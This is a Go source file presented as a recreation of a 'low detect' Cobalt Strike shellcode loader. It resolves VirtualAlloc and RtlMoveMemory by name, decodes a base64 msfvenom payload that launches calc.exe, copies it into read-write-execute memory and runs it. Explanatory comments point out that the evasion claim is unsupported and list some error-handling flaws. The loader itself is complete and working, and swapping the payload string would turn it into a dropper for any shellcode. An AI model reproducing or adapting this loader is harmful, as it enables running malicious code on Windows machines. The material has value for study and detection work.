Recreation of "low detect" cobaltstrike go loader
package main
import (
"syscall"
b64 "encoding/base64"
"unsafe"
)
// Win32 memory flags passed to VirtualAlloc in main; the values match the
// Windows SDK definitions of the same names.
const (
	MEM_COMMIT             = 0x00001000
	MEM_RESERVE            = 0x00002000
	PAGE_EXECUTE_READWRITE = 0x40 // RWX: readable, writable and executable in one page
)
// main is the whole loader: it resolves two Win32 routines by name at run
// time, decodes a base64 payload, places it in a freshly allocated RWX region
// and transfers control to it. It only builds on GOOS=windows, because
// syscall.LoadDLL, (*syscall.Proc).Call and the five-argument
// syscall.Syscall used below exist only there.
//
// Nothing in this path is hidden from the host: the process loads kernel32
// and ntdll by name, requests PAGE_EXECUTE_READWRITE memory, copies into it
// and then executes from a region that belongs to no loaded image. Each of
// those is a routine telemetry point, so the "low detect" claim in the gist
// title is not supported by anything visible in this code.
func main() {
	// Late-bound imports; the DLL and routine names are plain string literals.
	kernel32, err := syscall.LoadDLL("kernel32.dll")
	if err != nil {
		panic(err)
	}
	ntdll, err := syscall.LoadDLL("ntdll.dll")
	if err != nil {
		panic(err)
	}
	VirtualAlloc, err := kernel32.FindProc("VirtualAlloc")
	// In package syscall, FindProc returns a nil *Proc only together with a
	// non-nil error, so the `|| VirtualAlloc == nil` arm would reach panic
	// with a nil err; it never carries information of its own.
	if err != nil || VirtualAlloc == nil {
		panic(err)
	}
	RtlMoveMemory, err := ntdll.FindProc("RtlMoveMemory")
	if err != nil || RtlMoveMemory == nil {
		panic(err)
	}
	//msfvenom -a x64 -p windows/x64/exec CMD=calc.exe -f hex
	// The same payload as raw hex, left commented out; the base64 form below
	// is the one that is actually decoded (its leading bytes match this hex).
	//sc := "fc4883e4f0e8c0000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d08b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e957ffffff5d48ba0100000000000000488d8d0101000041ba318b6f87ffd5bbf0b5a25641baa695bd9dffd54883c4283c067c0a80fbe07505bb4713726f6a00594189daffd563616c632e65786500"
	// b64
	sc := "/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA"
	scb, err := b64.StdEncoding.DecodeString(sc)
	if err != nil {
		panic(err)
	}
	// One RWX region exactly the size of the decoded payload. Only the
	// returned address is kept; the error in the third result is discarded,
	// so a failed allocation (addr == 0) is not noticed here.
	addr, _, _ := VirtualAlloc.Call(
		uintptr(0),
		uintptr(len(scb)),
		MEM_COMMIT|MEM_RESERVE,
		PAGE_EXECUTE_READWRITE)
	// Copy the decoded bytes into the new region. &scb[0] would panic if the
	// decoded payload were empty; the call's results are ignored.
	RtlMoveMemory.Call(
		addr,
		(uintptr)(unsafe.Pointer(&scb[0])),
		uintptr(len(scb)))
	// Transfer control: on Windows syscall.Syscall calls the routine at its
	// first argument, so this executes the copied bytes with three zero
	// arguments. Control comes back to Go only if the payload itself returns.
	syscall.Syscall(addr, 0, 0, 0, 0)
}